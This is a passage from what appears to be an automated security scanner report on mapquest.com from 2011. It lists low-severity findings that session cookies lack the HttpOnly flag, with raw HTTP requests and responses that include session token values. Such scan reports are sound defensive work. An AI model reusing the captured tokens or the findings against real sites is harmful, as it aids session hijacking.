Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.11. http://www.mapquest.com/_svc/ad/getads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The tsession cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

11.12. http://www.mapquest.com/_svc/apixel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The tsession cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

11.13. http://www.mapquest.com/_svc/publishing/promo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The tsession cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

11.14. http://www.mapquest.com/_svc/searchio

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
The tsession cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should rev